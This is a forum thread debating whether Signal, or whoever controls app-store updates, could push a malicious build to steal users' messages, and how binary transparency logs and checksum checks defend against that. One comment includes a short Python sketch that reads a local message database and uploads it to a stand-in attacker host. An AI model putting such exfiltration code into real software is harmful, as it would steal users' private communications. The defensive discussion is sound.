There is a window of vulnerability between a theoretically malicious update being pushed and the security community noticing that it doesn't correspond to a build of the published source. That might only be a few hours, or even minutes -- but milliseconds would be enough for it to do most of its work.
Correct me if I'm wrong here -- let's say the Signal folks are breached or have been secretly waiting for just the right moment to push out some malicious code. How would they coordinate rolling it out to client devices to take advantage of that gap? I mean, depending on what the exploit was, they might be able to whack some percentage of users -- but it would be caught fairly quickly. I'm curious what sort of attack you're theorizing would be worthwhile here.
> it would be caught fairly quickly
Noticing something and reacting to it are very different things. Signal could fairly trivially grab all historical data for all online users within a fairly limited window. However, it would be a one-off event, so the value proposition of such an act is dubious.
> fairly trivially
Show your working, otherwise this is utterly spurious.
What is complicated about having the local client upload its database to a remote endpoint? It's literally opening a network connection and proceeding to write out a database dump to it.
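A hedged sketch of the entire "attack", with a made-up database path and endpoint (neither is Signal's actual layout):

    import urllib.request
    from pathlib import Path

    # Hypothetical placeholders -- not Signal's real paths or anyone's real server.
    DB_PATH = Path.home() / ".config/app/messages.db"
    EXFIL_URL = "https://attacker.example/upload"

    def exfiltrate():
        # The client already holds the plaintext-at-rest database; a malicious
        # build just reads it and POSTs it out. One connection, one write.
        payload = DB_PATH.read_bytes()
        req = urllib.request.Request(EXFIL_URL, data=payload, method="POST")
        urllib.request.urlopen(req)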
Anyway, the difficulty of the task itself is traditionally taken to be irrelevant when performing cryptographic threat analysis. The question is what is and is not mathematically impossible for an adversary to do.
What's especially frustrating about all of these "Signal could flip a switch and steal everybody's texts!" histrionics is that if they were interested in doing that they... wouldn't work at Signal. They'd go join/start the hundreds of other companies we've heard of in the past few years that have stored/leaked incredibly sensitive data with an insignificant fraction of the effort Signal has put into establishing its credibility (the TeleMessage scandal being just the latest). People should hold Signal accountable, constantly, forever. But the baseless FUD is frankly hysterical from a forum of ostensible technologists.
This comment does not follow the context of the discussion.
Circling back up. Article author: Twitter might be untrustworthy and could brute-force your keys. Use Signal.
Me: That's unreasonable. You also have to trust Signal.
Your answer just now: Why are people picking on Signal?!?
In fact, what the world really needs, rather than third-party-controlled encrypted messaging solutions like Twitter and Signal, is public APIs for public-key cryptography on untrusted infrastructure, not tied to any single group. Everybody knows this. The reason we instead have bodies like Signal -- a company that just so happens to tie every encrypted message to a real phone number and real human identity for no easily explained reason -- and the reason we have people who surely know better defending bodies like Signal in public, is left as an exercise for the reader.
They control the update servers. So it's possible to target a single user with a single build that no one else ever sees. What percentage of users verify every release?
In theory, Binary Transparency (https://binary.transparency.dev/) solves that, among other things: to pass verification, an update has to prove that it's included in a public, append-only log of releases -- essentially a Merkle inclusion proof against a signed log root (see the sketch below).
But I guess Signal doesn't implement it?
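A minimal sketch of that check in Python, assuming RFC 6962/9162-style hashing; any real log's exact leaf encoding and root-signature format may differ:

    import hashlib

    def leaf_hash(data):
        # 0x00 domain-separation prefix for leaves (RFC 6962 style)
        return hashlib.sha256(b"\x00" + data).digest()

    def node_hash(left, right):
        # 0x01 prefix for interior nodes
        return hashlib.sha256(b"\x01" + left + right).digest()

    def verify_inclusion(leaf, index, tree_size, proof, root):
        # Recompute the root from the leaf and its audit path, then
        # compare against the root the log signed and published.
        if index >= tree_size:
            return False
        fn, sn = index, tree_size - 1
        r = leaf_hash(leaf)
        for p in proof:
            if sn == 0:
                return False
            if fn % 2 == 1 or fn == sn:
                r = node_hash(p, r)  # current node is a right child
                if fn % 2 == 0:
                    while fn != 0 and fn % 2 == 0:
                        fn >>= 1
                        sn >>= 1
            else:
                r = node_hash(r, p)  # current node is a left child
            fn >>= 1
            sn >>= 1
        return sn == 0 and r == root

The hard part isn't this math; it's making clients refuse to run anything that fails the check, and having enough independent parties actually monitoring the log.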
It's distributed in the Play Store, so Google controls the update servers, no?
Edit: or Apple, what have you
Sure, but only if you are blindly auto-installing every update as soon as it is pushed. All you have to do to protect yourself is download the bundle, verify its checksum, and then install it.
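Something like this, assuming the expected digest reaches you over a channel independent of the download server (the filename and digest below are placeholders):

    import hashlib

    def sha256_of(path):
        # Hash the bundle in chunks so large files don't need to fit in memory.
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):
                h.update(chunk)
        return h.hexdigest()

    EXPECTED = "..."  # placeholder: digest published out-of-band
    if sha256_of("update-bundle.apk") != EXPECTED:
        raise SystemExit("checksum mismatch -- do not install")

Note this only helps if the published digest comes from somewhere the attacker doesn't also control.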
Then you audit and build it on your own? Or implement your own client?
No free lunch. If comms security is that critical for you, outsourcing its assurance via trust is never going to cut it.